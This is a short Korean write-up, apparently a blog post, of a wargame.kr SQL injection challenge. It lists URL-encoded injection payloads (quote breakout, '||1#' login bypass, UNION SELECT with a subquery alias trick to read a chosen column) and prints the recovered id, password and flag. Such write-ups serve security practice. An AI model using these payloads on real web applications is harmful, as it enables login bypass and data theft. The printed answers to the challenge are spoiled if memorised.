다행히 '를 막아놓지 않았음 이를 이용해서 id와 password는 쉽게 알수 있는데
<password>
id=%27%20union%20select%201%2c&pw=%2c3%2c4%2c5%2
xPw4coaa1sslfe
!@SA#$!
<id>
adm1ngnngn
id=%27||1%23
문제는 flag.. as(alias)를 이용한다
select 1,t,3,4 from (select 1,2,3,4 as t union select * from web) as tt;
이런식의 쿼리를 쓰면 칼럼의 위치만 알아도 원하는 칼럼을 출력할 수 있다.
as를 잘 이해하면 저 쿼리를 이해할 수 있다.
<flag>
buhyH3XvBVPJKmnx9F8sLzRp2USTCcOotZ67IgQND5WYdi40alwrkqAEfGMe1j
id=%27%20union%20select%201%2cq%2c3%2c4%2c5%20from%20(select%201%2c2%2c3%2c4%20as%20q%20%2c5%20union%20select%20*%20from%20findflag%5f2)%20as%20t%20limit%201%2c1%23
'war game > wargame.kr' 카테고리의 다른 글
[wargame.kr]Crypto Crackme Basic (0) | 2017.03.08 |
---|---|
[wargame.kr]Qna (1) | 2017.03.03 |
[wargame.kr]ip_log_table (0) | 2017.03.02 |
[wargame.kr]lonely_guys (0) | 2017.03.02 |
[wargame.kr]dmbs335 (0) | 2017.02.25 |